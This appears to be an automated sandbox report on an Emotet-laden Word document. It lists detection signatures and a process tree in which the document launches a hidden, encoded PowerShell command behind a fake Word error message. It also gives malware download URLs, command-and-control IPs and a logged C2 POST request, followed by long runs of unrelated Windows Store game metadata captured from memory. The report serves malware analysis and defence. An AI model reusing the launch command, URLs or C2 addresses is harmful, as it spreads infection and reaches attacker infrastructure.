Analysis Report v22Pc0qA.doc.doc

Overview

General Information

Sample Name: v22Pc0qA.doc.doc
Analysis ID: 347028
MD5: 7a7d325948481b0557b035249bf5c96a
SHA1: 0529727ffad8388fc94155d1652ca65189cda5df
SHA256: 47e4926bc53fb131b2e976d7b1c2f4b3c0f665242aa493d7e21b4df773b60919

Detection

Emotet
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
System process connects to network (likely due to code injection or exploit)
Yara detected Emotet
Creates processes via WMI
Document contains an embedded VBA with many GOTO operations indicating source code obfuscation
Encrypted powershell cmdline option found
Hides that the sample has been downloaded from the Internet (zone.identifier)
Machine Learning detection for dropped file
PowerShell case anomaly found
Powershell drops PE file
Sigma detected: Suspicious Encoded PowerShell Command Line
Suspicious powershell command line found
Very long command line found
Contains capabilities to detect virtual machines
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to dynamically determine API calls
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Document contains an embedded VBA macro which executes code when the document is opened / closed
Document contains embedded VBA macros
Drops PE files
Drops PE files to the windows directory (C:\Windows)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found evasive API chain (may stop execution after checking a module file name)
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
PE file contains an invalid checksum
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Queries the volume information (name, serial number etc) of a device
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match

Startup

  • System is w10x64
  • WINWORD.EXE (PID: 4180 cmdline: 'C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE' /Automation -Embedding MD5: 0B9AB9B9C4DE429473D6450D4297A123)
  • cmd.exe (PID: 5632 cmdline: cmd cmd cmd cmd /c msg %username% /v Word experienced an error trying to open the file. & POwersheLL -w hidden -ENCOD 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 MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
    • conhost.exe (PID: 5620 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • msg.exe (PID: 6068 cmdline: msg user /v Word experienced an error trying to open the file. MD5: EEB395D8DD3C1D6593903BD640687948)
    • powershell.exe (PID: 1320 cmdline: POwersheLL -w hidden -ENCOD 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 MD5: 95000560239032BC68B4C2FDFCDEF913)
      • rundll32.exe (PID: 6760 cmdline: 'C:\Windows\system32\rundll32.exe' C:\Users\user\F2nefq6\Prs2ndh\Chpieog.dll,#1 MD5: 73C519F050C20580F8A62C849D49215A)
        • rundll32.exe (PID: 6728 cmdline: 'C:\Windows\system32\rundll32.exe' C:\Users\user\F2nefq6\Prs2ndh\Chpieog.dll,#1 MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
          • rundll32.exe (PID: 6960 cmdline: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Ezfa\bvb.lli',RunDLL MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
  • svchost.exe (PID: 7136 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 6008 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 5616 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Memory Dumps

Source | Rule | Description | Author | Strings
00000008.00000002.922521031.0000000000F41000.00000020.00000001.sdmp | JoeSecurity_Emotet | Yara detected Emotet | Joe Security |
00000004.00000002.689082292.00000271130C0000.00000004.00000001.sdmp | PowerShell_Case_Anomaly | Detects obfuscated PowerShell hacktools | Florian Roth | 0x2ba:$s1: POwersheLL
00000004.00000003.685190093.000002712B8A4000.00000004.00000001.sdmp | PowerShell_Case_Anomaly | Detects obfuscated PowerShell hacktools | Florian Roth | 0x5b0:$s1: POwersheLL; 0x45c0:$s1: POwersheLL
00000008.00000002.922478242.0000000000F20000.00000040.00000001.sdmp | JoeSecurity_Emotet | Yara detected Emotet | Joe Security |
00000004.00000002.700514213.000002712B630000.00000004.00000001.sdmp | PowerShell_Case_Anomaly | Detects obfuscated PowerShell hacktools | Florian Roth | 0x191c:$s1: POwersheLL

Unpacked PEs

Source | Rule | Description | Author | Strings
8.2.rundll32.exe.f20000.1.unpack | JoeSecurity_Emotet | Yara detected Emotet | Joe Security |
8.2.rundll32.exe.f40000.2.unpack | JoeSecurity_Emotet | Yara detected Emotet | Joe Security |
6.2.rundll32.exe.1090000.2.unpack | JoeSecurity_Emotet | Yara detected Emotet | Joe Security |
6.2.rundll32.exe.1070000.1.raw.unpack | JoeSecurity_Emotet | Yara detected Emotet | Joe Security |
6.2.rundll32.exe.1070000.1.unpack | JoeSecurity_Emotet | Yara detected Emotet | Joe Security |

Sigma Overview

System Summary:

Sigma detected: Suspicious Encoded PowerShell Command Line
Source: Process started; Author: Florian Roth, Markus Neis; Data: Command: POwersheLL -w hidden -ENCOD [Base64-encoded payload omitted]

Signature Overview

AV Detection:

Antivirus detection for URL or domain
  Source: https://www.isatechnology.com/training/b/ | Avira URL Cloud: Label: malware
  Source: http://transfersuvan.com/wp-admin/OVl/ | Avira URL Cloud: Label: malware
  Source: http://arquivopop.com.br/index_htm_files/Kxh/ | Avira URL Cloud: Label: malware
  Source: https://cairocad.com/cgi-bin/1PBB/ | Avira URL Cloud: Label: malware
  Source: http://ownitconsignment.com/files/b/ | Avira URL Cloud: Label: malware
Multi AV Scanner detection for domain / URL
  Source: isatechnology.com | Virustotal: Detection: 7%
Multi AV Scanner detection for dropped file
  Source: C:\Users\user\F2nefq6\Prs2ndh\Chpieog.dll | Metadefender: Detection: 52%
  Source: C:\Users\user\F2nefq6\Prs2ndh\Chpieog.dll | ReversingLabs: Detection: 96%
Multi AV Scanner detection for submitted file
  Source: v22Pc0qA.doc.doc | Virustotal: Detection: 72%
  Source: v22Pc0qA.doc.doc | Metadefender: Detection: 44%
  Source: v22Pc0qA.doc.doc | ReversingLabs: Detection: 86%
Machine Learning detection for dropped file
  Source: C:\Users\user\F2nefq6\Prs2ndh\Chpieog.dll | Joe Sandbox ML: detected

Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 8_2_00F593E4 CryptDecodeObjectEx,8_2_00F593E4

Compliance:

Uses new MSVCR Dlls
  Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE | File opened: C:\Windows\SysWOW64\MSVCR100.dll
Uses secure TLS version for HTTPS connections
  Source: unknown | HTTPS traffic detected: 194.209.195.106:443 -> 192.168.2.4:49742 version: TLS 1.2
  Source: unknown | HTTPS traffic detected: 35.208.182.43:443 -> 192.168.2.4:49744 version: TLS 1.2
Binary contains paths to debug symbols
  Source: Binary string: System.Management.Automation.pdb-4437-8B11-F424491E3931}\InprocServer32 source: powershell.exe, 00000004.00000003.687729373.000002712B84E000.00000004.00000001.sdmp

Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 8_2_00F4A461 FindFirstFileW,8_2_00F4A461
Source: global traffic | DNS query: name: physio-svdh.ch
Source: global traffic | TCP traffic: 192.168.2.4:49742 -> 194.209.195.106:443
Source: global traffic | TCP traffic: 192.168.2.4:49773 -> 50.116.111.59:8080
Source: Joe Sandbox View | IP Address: 97.120.3.198
Source: Joe Sandbox View | IP Address: 50.116.111.59
Source: Joe Sandbox View | ASN Name: CENTURYLINK-US-LEGACY-QWESTUS
Source: Joe Sandbox View | ASN Name: GOOGLE-2US
Source: Joe Sandbox View | JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: global traffic | HTTP traffic detected:
  POST /hzctvbal94fl2bqa/ HTTP/1.1
  DNT: 0
  Referer: 173.249.20.233/hzctvbal94fl2bqa/
  Content-Type: multipart/form-data; boundary=------------------eWKPCakCSQtYkd9BaQ
  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
  Host: 173.249.20.233:443
  Content-Length: 8516
  Connection: Keep-Alive
  Cache-Control: no-cache
Source: unknown | TCP traffic detected without corresponding DNS query: 97.120.3.198
Source: unknown | TCP traffic detected without corresponding DNS query: 70.180.33.202
Source: unknown | TCP traffic detected without corresponding DNS query: 50.116.111.59
Source: unknown | TCP traffic detected without corresponding DNS query: 173.249.20.233
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 8_2_00F414E6 InternetReadFile,8_2_00F414E6
                Source: svchost.exe, 0000000F.00000003.742084704.00000279643D8000.00000004.00000001.sdmpString found in binary or memory: !\r\nCollect them all! Search for \"g5\" in Windows Store! \r\n____________________________\r\n\r\nVISIT US: www.g5e.com\r\nWATCH US: www.youtube.com/g5enter\r\nFIND US: www.facebook.com/HiddenCityGame\r\nJOIN US: https://instagram.com/hiddencity_\r\nFOLLOW US: www.twitter.com/g5games\r\nTerms of Service: http://www.g5e.com/termsofservice \r\nG5 End User License Supplemental Terms: http://www.g5e.com/G5_End_User_License_Supplemental_Terms","ProductTitle":"Hidden City: Hidden Object Adventure","SearchTitles":[{"SearchTitleString":"find hidden objects ","SearchTitleType":"SearchHint"},{"SearchTitleString":"junes pearls free ","SearchTitleType":"SearchHint"},{"SearchTitleString":"ispy notes peril","SearchTitleType":"SearchHint"},{"SearchTitleString":"seekers mystery ","SearchTitleType":"SearchHint"},{"SearchTitleString":"detective manor solving","SearchTitleType":"SearchHint"},{"SearchTitleString":"sherlock hotel spot it","SearchTitleType":"SearchHint"},{"SearchTitleString":"puzzle game journey 
","SearchTitleType":"SearchHint"}],"Language":"en","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","AG","AM","AW","BO","BQ","BA","BW","BV","IO","BN","BF","BI","KH","CM","CV","KY","CF","TD","TL","DJ","DM","DO","EC","SV","GQ","ER","ET","FK","FO","FJ","GF","PF","TF","GA","GM","GE","GH","GI","GL","GD","GP","GU","GG","GN","GW","GY","HT","HM","HN","AZ","BS","BB","BY","BZ","BJ","BM","BT","KM","CG","CD","CK","CX","CC","CI","CW","JM","SJ","JE","KI","KG","LA","LS","LR","MO","MK","MG","MW","IM","MH","MQ","MU","YT","FM","MD","MN","MS","MZ","MM","NA","NR","NP","MV","ML","NC","NI","NE","NU","NF","PW","PS","PA","PG","PY","RE","RW","BL","MF","WS","ST","SN","MP","PN","SX","SB","SO","SC","SL","GS","SH","KN","LC","PM","VC","TJ","TZ","TG","TK","TO","TM","TC","TV","UM","UG","VI","VG","WF","EH","ZM","ZW","UZ","VU","SR","SZ","AD","MC","SM","ME","VA","NEUTRAL"]}],"MarketProperties":[{"RelatedProducts":[],"Markets":["US"]}],"ProductASchema":"Product;3","ProductBSchema":"ProductGame;1","ProductId":"9NBLGGH6J6VK","Properties":{"PackageFamilyName":"828B5831.HiddenCityMysteryofShadows_ytsefhwckbdv6","PackageIdentityName":"828B5831.HiddenCityMysteryofShadows","PublisherCertificateName":"CN=A4F05332-BE3A-4155-B996-B100171CD4B1","XboxCrossGenSetId":null,"XboxConsoleGenOptimized":null,"XboxConsoleGenCompatible":null},"AlternateIds":[{"IdType":"LegacyWindowsStoreProductId","Value":"8cb666bc-49d3-4722-bb14-5643aee3a729"},{"IdType":"LegacyWindowsPhoneProductId","Value":"94ad5279-e84a-4d40-b7cf-c6f16f916e6c"},{"IdType":"XboxTitleId","Value":"2124184622"}],"IngestionSourc
                Source: svchost.exe, 0000000F.00000003.742108249.0000027964351000.00000004.00000001.sdmpString found in binary or memory: !\r\nCollect them all! Search for \"g5\" in Windows Store! \r\n____________________________\r\n\r\nVISIT US: www.g5e.com\r\nWATCH US: www.youtube.com/g5enter\r\nFIND US: www.facebook.com/HiddenCityGame\r\nJOIN US: https://instagram.com/hiddencity_\r\nFOLLOW US: www.twitter.com/g5games\r\nTerms of Service: http://www.g5e.com/termsofservice \r\nG5 End User License Supplemental Terms: http://www.g5e.com/G5_End_User_License_Supplemental_Terms","SkuTitle":"Hidden City: Hidden Object Adventure","Language":"en","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","AG","AM","AW","BO","BQ","BA","BW","BV","IO","BN","BF","BI","KH","CM","CV","KY","CF","TD","TL","DJ","DM","DO","EC","SV","GQ","ER","ET","FK","FO","FJ","GF","PF","TF","GA","GM","GE","GH","GI","GL","GD","GP","GU","GG","GN","GW","GY","HT","HM","HN","AZ","BS","BB","BY","BZ","BJ","BM","BT","KM","CG","CD","CK","CX","CC","CI","CW","JM","SJ","JE","KI","KG","LA","LS","LR","MO","MK","MG","MW","IM","MH","MQ","MU","YT","FM","MD","MN","MS","MZ","MM","NA","NR","NP","MV","ML","NC","NI","NE","NU","NF","PW","PS","PA","PG","PY","RE","RW","BL","MF","WS","ST","SN","MP","PN","SX","SB","SO","SC","SL","GS","SH","KN","LC","PM","VC","TJ","TZ","TG","TK","TO","TM","TC","TV","UM","UG","VI","VG","WF","EH","ZM","ZW","UZ","VU","SR","SZ","AD","MC","SM","ME","VA","NEUTRAL"]}],"ProductId":"9NBLGGH6J6VK","Properties":{"FulfillmentData":{"ProductId":"9NBLGGH6J6VK","WuCategoryId":"e15668ee-9cc1-4
bc2-ba76-e91eb1a11e95","PackageFamilyName":"828B5831.HiddenCityMysteryofShadows_ytsefhwckbdv6","SkuId":"0011"},"FulfillmentType":null,"FulfillmentPluginId":null,"Packages":[{"Applications":[{"ApplicationId":"App"}],"Architectures":["x86"],"Capabilities":["internetClient"],"ExperienceIds":[],"MaxDownloadSizeInBytes":426163994,"PackageFormat":"EAppxBundle","PackageFamilyName":"828B5831.HiddenCityMysteryofShadows_ytsefhwckbdv6","MainPackageFamilyNameForDlc":null,"PackageFullName":"828B5831.HiddenCityMysteryofShadows_1.39.3900.70_neutral_~_ytsefhwckbdv6","PackageId":"79986a28-1780-2990-8357-26989e97befa-X86","PackageRank":30011,"PlatformDependencies":[{"MaxTested":2814750931222528,"MinVersion":2814750438195200,"PlatformName":"Windows.Xbox"}],"PlatformDependencyXmlBlob":"{\"blob.version\":1688867040526336,\"content.bundledPackages\":[\"828B5831.HiddenCityMysteryofShadows_1.39.3900.70_x86__ytsefhwckbdv6\"],\"content.isMain\":false,\"content.packageId\":\"828B5831.HiddenCityMysteryofShadows_1.39.3900.70_neutral_~_ytsefhwckbdv6\",\"content.productId\":\"94ad5279-e84a-4d40-b7cf-c6f16f916e6c\",\"content.targetPlatforms\":[{\"platf
                Source: svchost.exe, 0000000F.00000003.742108249.0000027964351000.00000004.00000001.sdmpString found in binary or memory: !\r\nCollect them all! Search for \"g5\" in Windows Store! \r\n____________________________\r\n\r\nVISIT US: www.g5e.com\r\nWATCH US: www.youtube.com/g5enter\r\nFIND US: www.facebook.com/HiddenCityGame\r\nJOIN US: https://instagram.com/hiddencity_\r\nFOLLOW US: www.twitter.com/g5games\r\nTerms of Service: http://www.g5e.com/termsofservice \r\nG5 End User License Supplemental Terms: http://www.g5e.com/G5_End_User_License_Supplemental_Terms","SkuTitle":"Hidden City: Hidden Object Adventure","Language":"en","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","AG","AM","AW","BO","BQ","BA","BW","BV","IO","BN","BF","BI","KH","CM","CV","KY","CF","TD","TL","DJ","DM","DO","EC","SV","GQ","ER","ET","FK","FO","FJ","GF","PF","TF","GA","GM","GE","GH","GI","GL","GD","GP","GU","GG","GN","GW","GY","HT","HM","HN","AZ","BS","BB","BY","BZ","BJ","BM","BT","KM","CG","CD","CK","CX","CC","CI","CW","JM","SJ","JE","KI","KG","LA","LS","LR","MO","MK","MG","MW","IM","MH","MQ","MU","YT","FM","MD","MN","MS","MZ","MM","NA","NR","NP","MV","ML","NC","NI","NE","NU","NF","PW","PS","PA","PG","PY","RE","RW","BL","MF","WS","ST","SN","MP","PN","SX","SB","SO","SC","SL","GS","SH","KN","LC","PM","VC","TJ","TZ","TG","TK","TO","TM","TC","TV","UM","UG","VI","VG","WF","EH","ZM","ZW","UZ","VU","SR","SZ","AD","MC","SM","ME","VA","NEUTRAL"]}],"ProductId":"9NBLGGH6J6VK","Properties":{"FulfillmentData":{"ProductId":"9NBLGGH6J6VK","WuCategoryId":"e15668ee-9cc1-4
bc2-ba76-e91eb1a11e95","PackageFamilyName":"828B5831.HiddenCityMysteryofShadows_ytsefhwckbdv6","SkuId":"0011"},"FulfillmentType":null,"FulfillmentPluginId":null,"Packages":[{"Applications":[{"ApplicationId":"App"}],"Architectures":["x86"],"Capabilities":["internetClient"],"ExperienceIds":[],"MaxDownloadSizeInBytes":426163994,"PackageFormat":"EAppxBundle","PackageFamilyName":"828B5831.HiddenCityMysteryofShadows_ytsefhwckbdv6","MainPackageFamilyNameForDlc":null,"PackageFullName":"828B5831.HiddenCityMysteryofShadows_1.39.3900.70_neutral_~_ytsefhwckbdv6","PackageId":"79986a28-1780-2990-8357-26989e97befa-X86","PackageRank":30011,"PlatformDependencies":[{"MaxTested":2814750931222528,"MinVersion":2814750438195200,"PlatformName":"Windows.Xbox"}],"PlatformDependencyXmlBlob":"{\"blob.version\":1688867040526336,\"content.bundledPackages\":[\"828B5831.HiddenCityMysteryofShadows_1.39.3900.70_x86__ytsefhwckbdv6\"],\"content.isMain\":false,\"content.packageId\":\"828B5831.HiddenCityMysteryofShadows_1.39.3900.70_neutral_~_ytsefhwckbdv6\",\"content.productId\":\"94ad5279-e84a-4d40-b7cf-c6f16f916e6c\",\"content.targetPlatforms\":[{\"platf
                Source: svchost.exe, 0000000F.00000003.742108249.0000027964351000.00000004.00000001.sdmpString found in binary or memory: !\r\nCollect them all! Search for \"g5\" in Windows Store! \r\n____________________________\r\n\r\nVISIT US: www.g5e.com\r\nWATCH US: www.youtube.com/g5enter\r\nFIND US: www.facebook.com/HiddenCityGame\r\nJOIN US: https://instagram.com/hiddencity_\r\nFOLLOW US: www.twitter.com/g5games\r\nTerms of Service: http://www.g5e.com/termsofservice \r\nG5 End User License Supplemental Terms: http://www.g5e.com/G5_End_User_License_Supplemental_Terms","SkuTitle":"Hidden City: Hidden Object Adventure","Language":"en","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","AG","AM","AW","BO","BQ","BA","BW","BV","IO","BN","BF","BI","KH","CM","CV","KY","CF","TD","TL","DJ","DM","DO","EC","SV","GQ","ER","ET","FK","FO","FJ","GF","PF","TF","GA","GM","GE","GH","GI","GL","GD","GP","GU","GG","GN","GW","GY","HT","HM","HN","AZ","BS","BB","BY","BZ","BJ","BM","BT","KM","CG","CD","CK","CX","CC","CI","CW","JM","SJ","JE","KI","KG","LA","LS","LR","MO","MK","MG","MW","IM","MH","MQ","MU","YT","FM","MD","MN","MS","MZ","MM","NA","NR","NP","MV","ML","NC","NI","NE","NU","NF","PW","PS","PA","PG","PY","RE","RW","BL","MF","WS","ST","SN","MP","PN","SX","SB","SO","SC","SL","GS","SH","KN","LC","PM","VC","TJ","TZ","TG","TK","TO","TM","TC","TV","UM","UG","VI","VG","WF","EH","ZM","ZW","UZ","VU","SR","SZ","AD","MC","SM","ME","VA","NEUTRAL"]}],"ProductId":"9NBLGGH6J6VK","Properties":{"FulfillmentData":{"ProductId":"9NBLGGH6J6VK","WuCategoryId":"e15668ee-9cc1-4
bc2-ba76-e91eb1a11e95","PackageFamilyName":"828B5831.HiddenCityMysteryofShadows_ytsefhwckbdv6","SkuId":"0011"},"FulfillmentType":null,"FulfillmentPluginId":null,"Packages":[{"Applications":[{"ApplicationId":"App"}],"Architectures":["x86"],"Capabilities":["internetClient"],"ExperienceIds":[],"MaxDownloadSizeInBytes":426163994,"PackageFormat":"EAppxBundle","PackageFamilyName":"828B5831.HiddenCityMysteryofShadows_ytsefhwckbdv6","MainPackageFamilyNameForDlc":null,"PackageFullName":"828B5831.HiddenCityMysteryofShadows_1.39.3900.70_neutral_~_ytsefhwckbdv6","PackageId":"79986a28-1780-2990-8357-26989e97befa-X86","PackageRank":30011,"PlatformDependencies":[{"MaxTested":2814750931222528,"MinVersion":2814750438195200,"PlatformName":"Windows.Xbox"}],"PlatformDependencyXmlBlob":"{\"blob.version\":1688867040526336,\"content.bundledPackages\":[\"828B5831.HiddenCityMysteryofShadows_1.39.3900.70_x86__ytsefhwckbdv6\"],\"content.isMain\":false,\"content.packageId\":\"828B5831.HiddenCityMysteryofShadows_1.39.3900.70_neutral_~_ytsefhwckbdv6\",\"content.productId\":\"94ad5279-e84a-4d40-b7cf-c6f16f916e6c\",\"content.targetPlatforms\":[{\"platf
                Source: svchost.exe, 0000000F.00000003.742299178.0000027964371000.00000004.00000001.sdmpString found in binary or memory: % Regular free updates with loads of new content\r\n____________________________ \r\n\r\nGame available in: English, French, Italian, German, Spanish, Portuguese, Brazilian Portuguese, Russian, Korean, Simplified Chinese, Traditional Chinese, Japanese, Arabic\r\n____________________________ \r\n\r\nSign up now for a weekly round-up of the best from G5 Games! www.g5e.com/e-mail\r\n____________________________ \r\n\r\nG5 Games - World of Adventures"!!\r\nCollect them all! Search for \"g5\" in Windows Store! \r\n____________________________\r\n\r\nVISIT US: www.g5e.com\r\nWATCH US: www.youtube.com/g5enter\r\nFIND US: www.facebook.com/HiddenCityGame\r\nJOIN US: https://instagram.com/hiddencity_\r\nFOLLOW US: www.twitter.com/g5games\r\nTerms of Service: http://www.g5e.com/termsofservice \r\nG5 End User License Supplemental Terms: http://www.g5e.com/G5_End_User_License_Supplemental_Terms","ProductTitle":"Hidden City: Hidden Object Adventure","SearchTitles":[{"SearchTitleString":"find hidden objects ","SearchTitleType":"SearchHint"},{"SearchTitleString":"junes pearls free ","SearchTitleType":"SearchHint"},{"SearchTitleString":"ispy notes peril","SearchTitleType":"SearchHint"},{"SearchTitleString":"seekers mystery ","SearchTitleType":"SearchHint"},{"SearchTitleString":"detective manor solving","SearchTitleType":"SearchHint"},{"SearchTitleString":"sherlock hotel spot it","SearchTitleType":"SearchHint"},{"SearchTitleString":"puzzle game journey 
","SearchTitleType":"SearchHint"}],"Language":"en","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","AG","AM","AW","BO","BQ","BA","BW","BV","IO","BN","BF","BI","KH","CM","CV","KY","CF","TD","TL","DJ","DM","DO","EC","SV","GQ","ER","ET","FK","FO","FJ","GF","PF","TF","GA","GM","GE","GH","GI","GL","GD","GP","GU","GG","GN","GW","GY","HT","HM","HN","AZ","BS","BB","BY","BZ","BJ","BM","BT","KM","CG","CD","CK","CX","CC","CI","CW","JM","SJ","JE","KI","KG","LA","LS","LR","MO","MK","MG","MW","IM","MH","MQ","MU","YT","FM","MD","MN","MS","MZ","MM","NA","NR","NP","MV","ML","NC","NI","NE","NU","NF","PW","PS","PA","PG","PY","RE","RW","BL","MF","WS","ST","SN","MP","PN","SX","SB","SO","SC","SL","GS","SH","KN","LC","PM","VC","TJ","TZ","TG","TK","TO","TM","TC","TV","UM","UG","VI","VG","WF","EH","ZM","ZW","UZ","VU","SR","SZ","AD","MC","SM","ME","VA","NEUTRAL"]}],"MarketProperties":[{"RelatedProducts":[],"Markets":["US"]}],"ProductASchema":"Product;3","ProductBSchema":"ProductGame;1","ProductId":"9NBLGGH6J6VK","Properties":{"PackageFamilyName":"828B5831.HiddenCityMysteryofShadows_ytsefhwckbdv6","PackageIdentityName
                Source: svchost.exe, 0000000F.00000003.742299178.0000027964371000.00000004.00000001.sdmpString found in binary or memory: % Regular free updates with loads of new content\r\n____________________________ \r\n\r\nGame available in: English, French, Italian, German, Spanish, Portuguese, Brazilian Portuguese, Russian, Korean, Simplified Chinese, Traditional Chinese, Japanese, Arabic\r\n____________________________ \r\n\r\nSign up now for a weekly round-up of the best from G5 Games! www.g5e.com/e-mail\r\n____________________________ \r\n\r\nG5 Games - World of Adventures"!!\r\nCollect them all! Search for \"g5\" in Windows Store! \r\n____________________________\r\n\r\nVISIT US: www.g5e.com\r\nWATCH US: www.youtube.com/g5enter\r\nFIND US: www.facebook.com/HiddenCityGame\r\nJOIN US: https://instagram.com/hiddencity_\r\nFOLLOW US: www.twitter.com/g5games\r\nTerms of Service: http://www.g5e.com/termsofservice \r\nG5 End User License Supplemental Terms: http://www.g5e.com/G5_End_User_License_Supplemental_Terms","ProductTitle":"Hidden City: Hidden Object Adventure","SearchTitles":[{"SearchTitleString":"find hidden objects ","SearchTitleType":"SearchHint"},{"SearchTitleString":"junes pearls free ","SearchTitleType":"SearchHint"},{"SearchTitleString":"ispy notes peril","SearchTitleType":"SearchHint"},{"SearchTitleString":"seekers mystery ","SearchTitleType":"SearchHint"},{"SearchTitleString":"detective manor solving","SearchTitleType":"SearchHint"},{"SearchTitleString":"sherlock hotel spot it","SearchTitleType":"SearchHint"},{"SearchTitleString":"puzzle game journey 
","SearchTitleType":"SearchHint"}],"Language":"en","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","AG","AM","AW","BO","BQ","BA","BW","BV","IO","BN","BF","BI","KH","CM","CV","KY","CF","TD","TL","DJ","DM","DO","EC","SV","GQ","ER","ET","FK","FO","FJ","GF","PF","TF","GA","GM","GE","GH","GI","GL","GD","GP","GU","GG","GN","GW","GY","HT","HM","HN","AZ","BS","BB","BY","BZ","BJ","BM","BT","KM","CG","CD","CK","CX","CC","CI","CW","JM","SJ","JE","KI","KG","LA","LS","LR","MO","MK","MG","MW","IM","MH","MQ","MU","YT","FM","MD","MN","MS","MZ","MM","NA","NR","NP","MV","ML","NC","NI","NE","NU","NF","PW","PS","PA","PG","PY","RE","RW","BL","MF","WS","ST","SN","MP","PN","SX","SB","SO","SC","SL","GS","SH","KN","LC","PM","VC","TJ","TZ","TG","TK","TO","TM","TC","TV","UM","UG","VI","VG","WF","E